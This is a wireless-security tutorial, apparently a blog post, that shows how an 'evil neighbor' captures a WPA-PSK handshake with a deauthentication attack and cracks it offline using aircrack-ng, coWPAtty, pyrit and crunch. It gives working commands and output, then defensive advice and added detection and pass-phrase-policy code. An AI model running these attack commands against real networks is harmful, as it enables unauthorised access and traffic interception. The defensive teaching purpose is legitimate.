How safe is your Wireless network? Even if you are using WPA-PSK?
It is possible to run a series of attacks that can compromise a wireless network and recover its WPA-PSK passphrase. This is possible because the wireless spectrum is a shared medium: you and your neighbor may share the same channel, so you can see his traffic and vice versa. Moreover, there are techniques and tools available for capturing the WPA-PSK handshake. With that capture in hand, you can run a brute-force or dictionary attack against it offline to obtain the passphrase.
The following exercise illustrates how an evil neighbor (call him Evil) can obtain your wireless WPA-PSK passphrase using a variety of offensive techniques and then connect to your home or small-office network.
This exercise is executed on BackTrack 5, which ships with all the tools installed, but it could be done on another Linux distribution or on Windows. In short, Evil needs to put his wireless card into monitor mode and inject packets using a technique known as a deauthentication attack. In parallel, he captures what is known as the four-way handshake, the exchange in which the client and the access point negotiate the keys used to encrypt the traffic. He can then run a brute-force or dictionary attack against that capture and obtain the passphrase. Let's see how he accomplishes this:
First he tells the driver to bring the wireless interface down. Then he uses macchanger to change the interface's MAC address to a fake one for deception purposes. Finally he brings the interface back up and checks that the MAC address change took effect.
$ ifconfig wlan0 down
$ sudo macchanger --mac=00:de:ad:be:ef:00 wlan0
Current MAC: 00:1d:e0:04:ae:71 (unknown)
Faked MAC: 00:de:ad:be:ef:00 (unknown)
$ sudo ifconfig wlan0 up
$ ifconfig wlan0 | head -1
wlan0 Link encap:Ethernet HWaddr 00:de:ad:be:ef:00
The next step is to enable monitor mode on the wlan0 interface. Monitor mode on a wireless card is the equivalent of promiscuous mode on an Ethernet card, with one advantage: since the wireless spectrum is a shared medium, frames from every nearby network on the channel can be captured without being connected to any of them.
$ sudo airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965AGN iwl4965 - [phy0]
(monitor mode enabled on mon0)
Now Evil can use airodump-ng, the wireless packet-capture tool, to show only the networks using WPA encryption (--encrypt wpa) on the interface that is in monitor mode.
$ sudo airodump-ng -i mon0 --encrypt wpa
After an initial recon and scan of the available wireless networks, he selects one that has clients associated with it. In this case it is the network on channel 8 with BSSID 00:12:80:ED:41:C0 and SSID SecureHomeNet.
Then he captures all raw 802.11 frames for this particular network; with this capture he can use aircrack-ng and other tools to crack the WPA2 handshake. To do this, airodump-ng is run on channel 8 (-c 8), filtered to the selected access point's MAC address (--bssid), and the captured frames are written (-w) to files prefixed outputfile.
$ sudo airodump-ng -c 8 --bssid 00:12:80:ED:41:C0 -w outputfile mon0
While this runs and shows which clients are associated with the access point, he opens another shell and injects packets into the selected network using the MAC address of a client connected to the access point. Different attack techniques could be used; the one used here is the deauthentication attack with 5 rounds (--deauth=5). This lets Evil capture the WPA/WPA2 handshake by forcing the client to re-authenticate. The -a option is the MAC address of the access point and -h is the host (client) MAC address.
$ sudo aireplay-ng --deauth=5 -e SecureHomeNet -a 00:12:80:ED:41:C0 -h 00:24:2C:6F:50:5D mon0
The interface MAC (00:1D:E0:04:AE:71) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:24:2C:6F:50:5D
10:30:04 Waiting for beacon frame (BSSID: 00:12:80:ED:41:C0) on channel 8
NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>).
10:30:04 Sending DeAuth to broadcast -- BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast -- BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast -- BSSID: [00:12:80:ED:41:C0]
10:30:05 Sending DeAuth to broadcast -- BSSID: [00:12:80:ED:41:C0]
10:30:06 Sending DeAuth to broadcast -- BSSID: [00:12:80:ED:41:C0]
If all goes well, once the attack finishes the handshake should appear in the top right corner of the airodump-ng shell.
He can now stop airodump-ng, verify that he has the four-way handshake, and then launch the brute-force attack. First, using tshark to filter on EAPOL, the capture shows the 4 packets of the handshake.
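From the defender's side, this burst of broadcast deauthentication frames carrying the AP's own address is exactly what a wireless IDS looks for. The following added example (not code from the original post) parses raw 802.11 management frames and flags any BSSID that sends several broadcast deauth/disassoc frames within a short window; the sample frames are constructed to mirror the output above.

```python
"""Flag broadcast deauthentication bursts in raw 802.11 frames (added example)."""
import struct
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_mgmt_frame(raw):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None."""
    if len(raw) < 24:
        return None
    ftype, subtype = (raw[0] >> 2) & 0x3, raw[0] >> 4
    if ftype != 0:  # frame type 0 = management
        return None
    a1, a2, a3 = mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22])
    # 10 = disassociation, 12 = deauthentication: body is a 16-bit reason code
    reason = struct.unpack_from("<H", raw, 24)[0] if subtype in (10, 12) and len(raw) >= 26 else None
    return subtype, a1, a2, a3, reason

def deauth_bursts(frames, window=2.0, threshold=3):
    """frames: list of (timestamp, raw_bytes). Returns {bssid: total} for every BSSID
    that sent at least `threshold` broadcast deauth/disassoc frames within `window` seconds."""
    hits = defaultdict(list)
    for ts, raw in frames:
        p = parse_mgmt_frame(raw)
        if p and p[0] in (10, 12) and p[1] == BROADCAST:
            hits[p[3]].append(ts)
    alerts = {}
    for bssid, times in hits.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[bssid] = len(times)
                break
    return alerts

def build_deauth(bssid, dst=BROADCAST, reason=7):
    # Constructed frame: FC 0xc0 (deauth), duration, addr1..3, seq ctrl, reason code
    return (b"\xc0\x00\x3a\x01" + mac_bytes(dst) + mac_bytes(bssid) + mac_bytes(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample: five broadcast deauths in ~2 s from the AP seen above, plus one beacon.
AP = "00:12:80:ed:41:c0"
SAMPLE = [(10.0 + 0.4 * i, build_deauth(AP)) for i in range(5)]
SAMPLE.append((10.5, b"\x80\x00\x00\x00" + mac_bytes(BROADCAST) + mac_bytes(AP) * 2 + b"\x00\x00"))
```

In a real deployment the frames would come from a monitor-mode capture; a legitimate AP rarely sends more than an occasional broadcast deauthentication, so even a low threshold produces few false positives.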
$ ls -lisa *.cap
2498937 408 -rw-r--r-- 1 root root 414162 2012-12-01 05:01 outputfile-01.cap
$ tshark -nnr outputfile-01.cap -R 'eapol'
2536 337.964671 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 155 Key (msg 1/4)
2538 337.981066 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 155 Key (msg 2/4)
2540 337.984640 00:12:80:ed:41:c0 -> 00:24:2c:6f:50:5d EAPOL 205 Key (msg 3/4)
2542 337.989262 00:24:2c:6f:50:5d -> 00:12:80:ed:41:c0 EAPOL 133 Key (msg 4/4)
Then, to make sure the captured handshake is sufficient to mount a brute-force or dictionary attack, pyrit can be used with -r to read the packet capture together with the analyze command.
$ pyrit -r outputfile-01.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'outputfile-01.cap' (1/1)...
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
#1: AccessPoint 00:12:80:ed:41:c0 ('SecureHomeNet'):
#1: Station 00:24:2c:70:fa:5d
#2: Station 20:54:76:27:85:a4
#3: Station 04:54:53:7f:4f:af
#4: Station 00:24:2c:6f:50:5d, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1
The required handshake is obtained, so Evil can now mount an offline dictionary attack. He knows that the WPA pre-shared key is between 8 and 63 ASCII characters long.
He first attempts a dictionary attack using aircrack-ng with -w to specify the word-list, -e to specify the SSID, and the packet capture that holds the handshake. Word-lists are easy to obtain on the Internet, for example from the Openwall website.
$ aircrack-ng -w /pentest/passwords/wordlists/password-2011.lst -e SecureHomeNet outputfile-01.cap
Besides aircrack-ng, he could use coWPAtty, created by Joshua Wright. The command is run with -f to load the word-list, -s to specify the SSID, -r to read the packet capture holding the handshake, and -2 in case the capture contains fewer than the 4 frames of the four-way handshake.
$ cowpatty -f /pentest/passwords/wordlists/password-2011.lst -s SecureHomeNet -r ~/outputfile-01.cap -2
cowpatty 4.6 - WPA-PSK dictionary attack. jwright@hasborg.com
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: 05091975
key no. 2000: 1010362776
The PSK is "1qaz2wsx".
Or he could use Pyrit. Pyrit can use multiple CPUs and GPUs, which makes it extremely powerful and efficient.
Using pyrit takes three steps: create an ESSID, import a word-list into the password database, and finally launch the attack with attack_batch.
$ pyrit -e SecureHomeNet create_essid
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Created ESSID 'SecureHomeNet'
$ pyrit -i /pentest/passwords/wordlists/password-2011.lst import_passwords
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
995760 lines read. Flushing buffers....
All done.
$ pyrit -r ~/outputfile-01.cap -e SecureHomeNet attack_batch
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Parsing file '/home/user/outputfile-01.cap' (1/1)...
Parsed 38 packets (38 802.11-packets), got 1 AP(s)
Picked AccessPoint 00:12:80:ed:41:c0 automatically…
Attacking handshake with station 00:24:2c:6f:50:5d
Tried 841112 PMKs so far (84.4%); 567 PMKs per second.
The password is '1qaz2wsx'.
After obtaining the pass-phrase, which can often be done easily with a good dictionary, it's game over. Evil can now decrypt the captured wireless traffic using airdecap-ng: with -e to specify the SSID and -p for the pass-phrase, airdecap-ng writes a new pcap file containing the decrypted traffic.
$ airdecap-ng -e SecureHomeNet -p 1qaz2wsx outputfile-01.cap
Total number of packets read 2939
Total number of WEP data packets 0
Total number of WPA data packets 708
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 17
$ ls -lisa *dec.cap
2499178 8 -rw-r--r-- 1 user user 4284 2012-12-01 11:03 outputfile-01-dec.cap
Or he can use tshark with -o to set preferences, in this case wlan.enable_decryption and wlan.wep_key1. The available settings can be seen with the command $ tshark -G currentprefs | grep wlan.
$ tshark -r outputfile-01.cap -o "wlan.enable_decryption:TRUE" -o wlan.wep_key1:wpa-pwd:1qaz2wsx:SecureHomeNet
Further, if the dictionary attack is unsuccessful because the pass-phrase is not in the dictionary, other attack vectors are available. Evil can mount a brute-force attack that computes all possible password combinations, for example letters a-z and digits 0-9, using crunch. The drawback is that this is ineffective, expensive and extremely time consuming.
The following crunch output illustrates how much space would be needed to generate a word-list with all possible combinations of the lower-case alphabet (26 characters) plus the digits 0 to 9, for a pass-phrase of exactly 8 characters (minimum and maximum length 8).
$ crunch 8 8 1234567890abcdefghijkmlnopqrstuvxywz
Crunch will now generate the following amount of data: 25389989167104 bytes
24213780 MB
23646 GB
23 TB
0 PB
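To check the figures crunch prints and to express the key space as cracking time, here is an added example (not code from the original post) that reproduces crunch's size calculation (36 symbols, length 8, one newline per candidate) and estimates the time to exhaust the key space at the 567 PMK/s rate pyrit reported above. The 95-symbol, 12-character case and the 1 million PMK/s rate are assumptions added for comparison with the policy recommended at the end of the post.

```python
"""Key-space arithmetic for the crunch run above (added example)."""
import string

def keyspace(charset_size, min_len, max_len):
    """Number of candidate pass-phrases of length min_len..max_len over charset_size symbols."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def crunch_bytes(charset_size, min_len, max_len):
    """Bytes crunch writes: every candidate followed by a newline."""
    return sum((charset_size ** n) * (n + 1) for n in range(min_len, max_len + 1))

def crunch_units(nbytes):
    """Whole-unit breakdown as crunch prints it (binary MB/GB/TB/PB, truncated)."""
    return {u: nbytes // (1024 ** p) for u, p in (("MB", 2), ("GB", 3), ("TB", 4), ("PB", 5))}

def seconds_to_exhaust(candidates, rate_per_second):
    """Worst-case time to try every candidate at a fixed PMK rate."""
    return candidates / rate_per_second

def years(seconds):
    return seconds / (365.25 * 24 * 3600)

CHARSET = string.digits + string.ascii_lowercase  # 36 symbols, as in the crunch command

if __name__ == "__main__":
    n = keyspace(len(CHARSET), 8, 8)
    b = crunch_bytes(len(CHARSET), 8, 8)
    print(n, b, crunch_units(b))  # matches the 25389989167104 bytes crunch reports
    # 567 PMK/s is the CPU rate pyrit reported in the write-up
    print(f"{years(seconds_to_exhaust(n, 567)):.0f} years at 567 PMK/s")
    # Assumed comparison: 12 characters over all 95 printable ASCII symbols at 1M PMK/s
    print(f"{years(seconds_to_exhaust(keyspace(95, 12, 12), 1_000_000)):.3g} years at 1M PMK/s")
```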
Evil could also combine crunch with aircrack-ng: aircrack-ng accepts passwords from standard input (-w -), so he can pipe the output of crunch into it. In crunch he sets the minimum (8) and maximum (8) password length plus the character set:
$ crunch 8 8 1234567890abcdefghijkmlnopqrstuvxwzy | aircrack-ng -e SecureHomeNet outputfile-01.cap -w -
Or he could use John the Ripper, redirecting its output to aircrack-ng:
john$ sudo ./john --stdout --incremental:all | aircrack-ng -e SecureHomeNet ~/outputfile-01.cap -w -
Both of these attacks will most likely fail. Evil doesn't know how many characters the pass-phrase has, and he is using a limited key space that will still take a significant amount of time. For example, a 5 character password consisting of lowercase letters and digits has 200 billion combinations; at the modest rate of 10,000 password attempts a second it can be broken in 90 minutes. An 8 character password consisting of lowercase, uppercase and digits has 218 trillion combinations; at a rate of 10,000 password attempts a second it will take 692 years to break [1]. The best alternatives Evil has are a good dictionary/word-list or precomputed hashes (aka rainbow tables).
Beyond decrypting the traffic, if Evil obtained your pass-phrase by either brute force or dictionary attack, he can connect to your network. If that happens you are exposed to devastating network attacks such as ARP spoofing, phishing, DNS poisoning and others.
How can you defend against this attack?
The best countermeasure against WPA-PSK attacks is to choose a good pass-phrase. Make sure it is at least 12 characters long, with a combination of numbers, upper and lower case letters, and special characters. In addition, choose a unique SSID: if your SSID is Home, Linksys or one of the top 1000, then most likely there is a hash table of precomputed passwords for your SSID.
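The reason a unique SSID defeats precomputed tables is that WPA-PSK derives the pairwise master key with PBKDF2-HMAC-SHA1 using the SSID as the salt, so a table built for 'linksys' says nothing about any other SSID. The added example below (not code from the post) shows this with Python's standard library and encodes the pass-phrase policy just described; the list of common SSIDs is a constructed stand-in for the "top 1000".

```python
"""Why a unique SSID and a long pass-phrase matter (added example)."""
import hashlib
import string

def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# Constructed stand-in for the "top 1000" SSID list referred to in the post.
COMMON_SSIDS = {"linksys", "home", "default", "netgear", "dlink"}

def check_passphrase(passphrase, min_len=12):
    """Return the policy problems from the post: length and character-class mix."""
    problems = []
    if len(passphrase) < min_len:
        problems.append(f"shorter than {min_len} characters")
    classes = {
        "digit": any(c in string.digits for c in passphrase),
        "lower": any(c in string.ascii_lowercase for c in passphrase),
        "upper": any(c in string.ascii_uppercase for c in passphrase),
        "special": any(c in string.punctuation for c in passphrase),
    }
    problems.extend(f"no {name} characters" for name, present in classes.items() if not present)
    return problems

def check_ssid(ssid):
    """Flag an SSID that a precomputed table is likely to exist for."""
    return ["SSID is on the common-names list"] if ssid.lower() in COMMON_SSIDS else []

if __name__ == "__main__":
    pw = "1qaz2wsx"  # the pass-phrase recovered in the write-up
    print(check_passphrase(pw), check_ssid("linksys"), check_ssid("SecureHomeNet"))
    # Same pass-phrase, different SSID: entirely different PMK, so a table for 'linksys' is useless
    print(wpa_pmk(pw, "linksys").hex())
    print(wpa_pmk(pw, "SecureHomeNet").hex())
```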
References:
[1] http://www.lockdown.co.uk/?pg=combi
Hacking Exposed Wireless: Wireless Security Secrets & Solutions